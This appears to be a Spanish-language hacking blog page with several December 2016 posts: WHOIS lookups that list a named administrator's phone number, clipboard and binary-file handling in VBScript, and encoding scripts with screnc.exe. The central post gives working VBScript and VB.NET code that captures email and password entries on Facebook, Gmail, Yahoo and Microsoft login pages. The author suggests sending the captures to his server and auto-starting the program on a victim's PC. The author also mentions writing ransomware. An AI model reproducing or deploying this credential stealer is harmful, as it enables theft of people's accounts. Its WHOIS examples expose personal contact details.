jueves, 29 de diciembre de 2016

Averiguar Datos De Una Pagina Web

Hoy les mostrare como obtener algunos datos de algunas paginas para eso usaremos una web llamada:
http://whois.domaintools.com/

Que hace pues bueno nos proporciona algunos datos del dueño de la pagina,servidor se aloja,país,correo entre otras cosas.

Lo malo de esta pagina es que aveces no proporciona todos los datos, ya que ciertas personas esconden sus datos ya sea para permanecer en el anonimato,permanecer seguros de ataques o en ciertos caso hay personas que lo hacen para hacer sus fechorías.

Bueno primeramente escojamos una pagina común para un ejemplo, en este ejemplo ya no elegiremos al hacker.net ya que sabemos que pertenece a alex o el brujo como se apoda, eligiéremos a esta:
http://www.radiologyinfo.org/

Nota: No les estoy haciendo publicidad solo las elegí para el ejemplo

Bueno así que ingresaremos la url en el siguiente cuadro de texto de la pagina y pulsamos el botón Search


nos apare sera lo siguiente



hay pueden ver el numero 1 pertenece a sus correos, el 2 a la organización registrada, el 3 fecha de creación que fue en 1999 y espira el contrato en 2021, el 4 a su ip, el 5 a la localización del servidor no de la persona y por ultimo el 6 que es el estatus del dominio si esta activo o inactivo.


Pero mas abajo nos encontramos con otras mas

Registrant ID: 23237610-NSI
Registrant Name: American College of Radiology
Registrant Organization: American College of Radiology
Registrant Street: 1891 PRESTON WHITE DR
Registrant City: Reston
Registrant State/Province: VA
Registrant Postal Code: 20191-4326
Registrant Country: US
Registrant Phone: +1.7037154393
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 
Admin ID: 42105327-NSI
Admin Name: American College of Radiology
Admin Organization: American College of Radiology
Admin Street: 1891 Preston White Drive
Admin City: Reston
Admin State/Province: VA
Admin Postal Code: 20191
Admin Country: US
Admin Phone: +1.703648890
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 

Aquí en estos datos pueden ver el código postal, ciudad, teléfono entre otras cosas.

Pero en este ejemplo no dice el nombre del administrador ni de quien lo registro así que buscaremos en otra pagina por si les interesa el campo nombre y buscaremos en la pagina de:

http://www.cinepolis.com/

Y nos muestra lo siguiente

Registrant Name: Servicios de Personal Cinemas SA de CV
Registrant Organization: Servicios de Personal Cinemas SA de CV
Registrant Street: Av. Camelinas No. 3527 Int. 902
Registrant City: Morelia
Registrant State/Province: Michoacan
Registrant Postal Code: 58270
Registrant Country: MX
Registrant Phone: +52.4433226237
Registrant Phone Ext: 
Registrant Fax: +52.4433226238
Registrant Fax Ext: 
Registrant Email: .mx
Registry Admin ID: 
Admin Name: Lozano Mtz, Juan Carlos
Admin Organization: Servicios de Personal Cinemas S.A. de C.V.
Admin Street: Av. Camelinas No. 3527 Int 902
Admin City: Morelia
Admin State/Province: Michoacan
Admin Postal Code: 58270
Admin Country: MX
Admin Phone: +52.4433220526
Admin Phone Ext: 
Admin Fax: +52.4433226238
Admin Fax Ext: 
Admin Email: 

Como pueden ver esta registrado a nombre de la compañía cinemas, también nos dice la ciudad que es morelia, código postal 58270 y entre otras cosas, pero pasemos a los datos del administrador que revela su nombre ya que como dije al principio hay algunas personas que lo ocultan pero lo veremos mas adelante.

El nombre del administrador es Lozano Mtz, Juan Carlos y párese que todo lo demás es igual a diferencia de que su teléfono que es +52 4433220526  que sea de la compañía o de el quien sabe.


Ahora pondremos otro ejemplo es de esta web:

http://hackearface.net/

Y nos muestra lo siguiente

Nombre: Whois Agent
Organización Whois Privacy Protection Service, Inc.
Dirección postal: PO Box 639, Kirkland WA 98083 US
Teléfono: +1 4252740657
Interno:
Fax: +1 4259744730
Interno:
Correo electrónico:hackearface.net@protecteddomainservices.com

Aquí como pueden ver oculta el nombre ya que Whois Agent quiere decir que esta privado o protegido, como también su correo que dice "protecteddomainservices" y la organización.

Aclaro puse como ejemplo esta web ya que fue la primera que encontré pero párese que no es segura así que no naveguen en ella si no saben lo que hacen y mucho menos introduzcan datos verdaderos

Otra cosa muy importante esta pagina tiene un limite diario creo, ya que si tiene un rato usándola les apare sera el siguiente mensaje.





Bueno saludos Flamer


domingo, 25 de diciembre de 2016

Metodo Averiguar Contraseñas De Facebook, Gmail, Yahoo y Hotmail

Esta ves vengo con un método para averiguar las claves de diferentes web y creo que funciona en varias no nomas las expuestas aquí.

Hace unas horas expuse este tema en el foro:

http://foro.elhacker.net/scripting/aporte_obtener_nombre_de_usuario_y_contrasena_de_facebook_con_un_simple_script-t462593.0.html

Y se me dio una idea y quise hacer algo mas grande, así que se me ocurrió hacerlo en vb.net, pero primero expliquemos el que expuse en el foro, aclaro no es el mismo ya que lo modifique un poco para que funcionara mas bien.

Primero declaramos las variables

option explicit
dim m,t,u,p,IE

Despues creamos un objecto de InternetExplorer

set IE = CreateObject("InternetExplorer.Application")

En la siguiente linea usamos el comando navigate para visualizar la pagina del facebook

IE.Navigate "https://www.facebook.com/"

Y para visualizar la ventana del Internet Explorer usamos este comando

IE.visible = true

Y creamos un ciclo do while para saber si ya cargo la pagina completamente

Do While IE.ReadyState < 4
Loop

Ahora pasamos el titulo de la ventana de inicio de sesión a la variable m

m = IE.LocationName

En la siguiente linea crearemos un ciclo while para saber si estamos en la ventana de inicio de sesión de facebook y cuando cambie el titulo de la ventana este dejara de ejecutarse.

Dentro de este tomamos el valor de el campo "email" y lo aguardamos en la variable "u" y si este campo logra cambiar su contenido preguntamos con el comando if por su valor y su longitud para después aguardar los cambios nuevos en la variable "u"

while IE.LocationName = m
   t = IE.document.GetElementById("email").value
   if t<>u and len(t)>len(u) then
      u = t
   end if   
 
   t =  IE.document.GetElementById("pass").value
   if t<>p and len(t)>len(p) then
      p = t
   end if 
 
   wscript.sleep 100
wend

Con el campo "pass" pasa lo mismo toma su valor y si cambia su contenido, estos cambios serán guardados en la variable "p"

Y por ultimo imprimimos el contenido con el comando msgbox

msgbox u & "        " & p 


Pero como dije al principio de que se me ocurrió otra idea mas grande, y es utilizar este método pero con diferentes paginas en una sola aplicación.

Pues para eso me programe el siguiente programa en vb.net, un poco mas extenso que el anterior y mejorado aquí el code


Option Explicit On
Public Class Form1
    Dim IE As Object
    Private Sub Form1_Load(sender As System.Object, e As System.EventArgs) Handles MyBase.Load
        IE = CreateObject("InternetExplorer.Application")
        IE.visible = True
        Timer1.Interval = 1
        Timer1.Start()
        'Me.Visible = False'
    End Sub

    Private Sub Timer1_Tick(sender As System.Object, e As System.EventArgs) Handles Timer1.Tick
        Select Case IE.LocationName
            Case "Yahoo - Ingreso"
                If InStr(IE.LocationUrl, "https://login.yahoo.com/") <> 0 Then
                    Timer1.Stop()
                    Log.Text = Log.Text & interseptar("Yahoo - Ingreso", "login-username", "login-passwd", "https://login.yahoo.com/")
                End If

            Case "Gmail"
                If InStr(IE.LocationUrl, "https://accounts.google.com/") <> 0 Then
                    Timer1.Stop()
                    Log.Text = Log.Text & interseptar("Gmail", "Email", "Passwd", "https://accounts.google.com/")
                End If
            Case "Facebook - Inicia sesión o regístrate"
                If InStr(IE.LocationUrl, "https://www.facebook.com/") <> 0 Then
                    Timer1.Stop()
                    Log.Text = Log.Text & interseptar("Facebook - Inicia sesión o regístrate", "email", "pass", "https://www.facebook.com/")
                End If
            Case "Iniciar sesión en tu cuenta Microsoft"
                If InStr(IE.LocationUrl, "https://login.live.com/") <> 0 Then
                    Timer1.Stop()
                    Log.Text = Log.Text & interseptar("Iniciar sesión en tu cuenta Microsoft", "i0116", "i0118", "https://login.live.com/")
                End If
        End Select
    End Sub
    Function interseptar(title, idu, idp, url)
        On Error Resume Next
        Dim u, p, t As String

        t = ""
        u = ""
        p = ""

        Do While IE.ReadyState < 4
        Loop
        While IE.LocationName = title
            t = IE.document.GetElementById(idu).value
            If t <> u And Len(t) > Len(u) Then
                u = t
            End If

            t = IE.document.GetElementById(idp).value
            If t <> p And Len(t) > Len(p) Then
                p = t
            End If
            System.Threading.Thread.Sleep(100)
        End While

        Timer1.Start()
        interseptar = url & "------" & u & "------" & p & vbCrLf & vbCrLf

    End Function

End Class 


Con un poco mas de imaginación podemos programar que lo capturado de todo el día lo envié a nuestro servidor o por correo y para eso nuestra aplicación tendría que iniciarse al prender la pc victima y otra cosa, es que esto puede funcionar para diferentes paginas.

Una de las desventajas de este programa son de que a veces no captura las claves pero en fin no todo es perfecto

Link del video donde muestro su uso:
https://www.youtube.com/watch?v=NmbFHN2TG5s

saludos Flamer

sábado, 24 de diciembre de 2016

Usar El ClipBoard Desde Vbscript

En esta ocasión vengo a mostrarles como usar el clipboard en vbscript, pero para los que no saben que es clipboard se los digo es el porta papeles y para los que no entiendan a un que es, es la acción de copiar y pegar que usamos comúnmente en la computadora.

Pero se preguntaran que aremos pues les enseñare a como leer el contenido de este usando el vbscript

Primeramente declaramos variables

option explicit
dim objclip,CopyText


Después de esto crearemos el objecto "objclip" que es un objecto htmlfile

Set objclip  = CreateObject("htmlfile")

Ahora pasaremos a leer el contenido que se encuentra en el porta papeles

CopyText = objclip.ParentWindow.ClipboardData.GetData("text")

y por ultimo lo imprimimos con el comando msgbox así

MsgBox CopyText


El codigo completo seria este


option explicit
dim objclip,CopyText
Set objclip  = CreateObject("htmlfile")
CopyText = objclip.ParentWindow.ClipboardData.GetData("text")
MsgBox CopyText


Ahora para borrar el contenido del porta papeles aremos otro programa, empezaremos declarando las variables

option explicit
dim objshell

Después creamos un objecto shell

set objshell = CreateObject("wscript.shell")


y por ultimo ejecutamos el símbolo del sistema con las siguientes lineas

objshell.run "cmd /c echo off | clip"


El código completo seria así


option explicit
dim objshell
set objshell = CreateObject("wscript.shell")
objshell.run "cmd /c echo off | clip"


y al ejecutarlo eliminara todo lo que se encuentra en el porta papeles

Pero se preguntaran para agregar algo en el porta papeles desde el programa o sea que sea programado en ves que lo halla hecho el usuario.

Pues seria casi lo mismo que el anterior con la diferencia de que el "echo off" seria "echo loquesea"
quedaría el código así.

option explicit
dim objshell
set objshell = CreateObject("wscript.shell")
objshell.run "cmd /c echo loquesea | clip"


Este código copiaría la palabra "loquesea" al porta papeles y estaría listo para usarse


Bueno amigos eso es todo saludos Flamer y lo expuesto aquí esta intentado en windows 10 y hice uso del cmd por que el método  "ClipboardData.ClearData" y "ClipboardData.SetData" no me funcionaron


miércoles, 14 de diciembre de 2016

Codificar Archivos Vbs a Vbe con La Herramienta Screnc.exe

Hoy les traigo una herramienta llamada "screnc.exe" esta herramienta nos servirá para codificar nuestros archivos ".vbs" y serán convertidos en archivos ".vbe".

Este programa anteriormente se encontraba en la pagina de microsoft pero acabo de darle una búsqueda y no logre encontrar nada, yo sinceramente no me acuerdo de donde lo conseguí ya que tengo tiempo con el así que lo subí a mediafire para compartirlo con ustedes.

Aqui la descarga: http://www.mediafire.com/file/ddhnjzkr48j641b/screnc.exe

Ahora les enseñare como usarla, pero primeramente crearemos un archivo ".vbs" al cual llamaremos "Ejemplo.vbs" y el código que contendrá este archivo sera el siguiente.


msgbox "hola mundo soy toto",,"aviso de bienvenida"


Ya que tenemos escrito lo anterior aguardamos los cambios y al ejecutarlo nos muestra el mensaje siguiente.




Después de esto nos iremos al símbolo del sistema o cmd como le quieran llamar.

Para eso abrimos la ventana ejecutar, escribimos cmd y presionamos aceptar



En esta ventana nos moveremos hasta la carpeta donde se encuentre el archivo "screnc.exe" y el archivo "Ejemplo.vbs"con el comando "cd".

Ya que se encuentren en dicha carpeta escribiremos lo siguiente.


Screnc Ejemplo.vbs  Salida.vbe



Y verán que se crea el archivo "Salida.vbe" y al ejecutarlo no muestra el mismo mensaje y si lo abrimos con el notepad++ nos muestra lo siguiente.







Ahora si quieren desencriptar el archivo "salida.vbe" pueden mirar un tema anterior que hice donde desencripto un archivo ".vbe" de un virus de macro:

http://elblogdeflamer.blogspot.mx/2016/04/analizando-una-muestra-de-un-virus-de.html


bueno saludos Flamer y creo que eso es todo por hoy


lunes, 5 de diciembre de 2016

Leer Binario En VBScript

Hoy vamos a ver como leer los archivos binarios en vbscript, yo al principio creía que no se podía leer binario en este lenguaje y ase poco creando el ransomware(el cual no es la gran cosa pero aveces me gusta matar el tiempo programando cualquier cosa) tuve la necesidad de leer binario, así que en una búsqueda de 5 minutos encontré esta web:

http://www.gatodev.com/index.php?qa=225695&qa_1=leer-y-escribir-archivos-binarios-en-vbscript

El cual contenía este código:

NOTA: lo pondré por si algún día la pagina borra el tema, se cae o algo por el estilo solo para tener un respaldo.

Function readBinary(path)
Dim a
Dim fso
Dim file
Dim i
Dim ts
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.getFile(path)
If isNull(file) Then
    MsgBox("File not found: " & path)
    Exit Function
End If
Set ts = file.OpenAsTextStream()
a = makeArray(file.size)
i = 0
' Do not replace the following block by readBinary = by ts.readAll(), it would result in broken output, because that method is not intended for binary data' 
While Not ts.atEndOfStream
    a(i) = ts.read(1)
i = i + 1
Wend
ts.close
readBinary = Join(a,"")
End Function

Sub writeBinary(bstr, path) Dim fso Dim ts Set fso = CreateObject("Scripting.FileSystemObject") On Error Resume Next Set ts = fso.createTextFile(path) If Err.number <> 0 Then MsgBox(Err.message) Exit Sub End If On Error GoTo 0 ts.Write(bstr) ts.Close End Sub

Function makeArray(n) ' Small utility function Dim s s = Space(n) makeArray = Split(s," ") End Function 


Viendo el código de esa web me base para crear el mio, que es casi igual pero con unas modificaciones.
Así que para practicar tomaremos mi crackme, el numero 7 que lo encontraran aquí:

http://elblogdeflamer.blogspot.mx/p/mis-cackmes.html


Tratare de explicar todo el código con clama.
Así que primeramente empecemos declarando todas las variables que usaremos

option explicit
Dim x,objsystem,file,i,f,largo


Ahora creamos un objecto FileSystemObject y lo representaremos con la variable objsystem

Set objsystem = CreateObject("Scripting.FileSystemObject")

Luego creamos una referencia al archivo que vamos a leer, que en este caso es el "crackme7.exe" y lo representaremos con la variable file.
OJO donde dice "crackme7.exe" es la ruta del archivo yo lo pongo así por que estoy trabajando en la misma carpeta.

Set file = objsystem.getFile("Crackme7.exe") 

Después de esto inicializamos la variable largo, con el valor del tamaño del archivo en bytes

largo=file.size 


Ya que tenemos enlazado al archivo que esta representado con la variable file, trataremos de abrirlo con el comando OpenAsTextStream así.

Set f = file.OpenAsTextStream()  

Después usaremos el comando Redim para crear un array el cual llamaremos bytes con el tamaño de el archivo, el cual esta representado con la variable largo

redim bytes(largo)  

Ahora para leer los bytes del archivo crearemos un ciclo for, el cual leerá byte por byte del archivo y los almacenara en el array llamado bytes

for i=0 to largo - 1
   bytes(i)=f.read(1)
next  

y para cerrar el archivo usamos el comando close

f.close   

Ya que leímos todos los bytes del archivo crearemos un archivo llamado "dump.txt" con el comando CreateTextFile, para almacenar los datos que leímos y el archivo creado lo representaremos con la variable file.

set file = objsystem.createtextfile("dump.txt")    

Ya que no podemos almacenar los datos de forma binaria, los convertiremos a su valor ascii y los separaremos con 2 guiones

Para eso crearemos un ciclo for para recorrer el array donde se encuentran los datos y de paso escribiremos los nuevos datos con el comando Write

for x = 0 to i - 1
   file.write(asc(bytes(x)) & "--")
next   

Y por ultimo cerramos el archivo con el comando close

file.close    


Aquí el código completo

option explicit
Dim x,objsystem,file,i,f,largo  

Set objsystem = CreateObject("Scripting.FileSystemObject") 

Set file = objsystem.getFile("Crackme7.exe")  

largo=file.size 

Set f = file.OpenAsTextStream()  

redim bytes(largo)

for i=0 to largo - 1
   bytes(i)=f.read(1)
next 

f.close 

set file = objsystem.createtextfile("dump.txt") 

for x = 0 to i - 1
   file.write(asc(bytes(x)) & "--")
next

file.close    



Bueno creo que eso es todo por hoy saludos flamer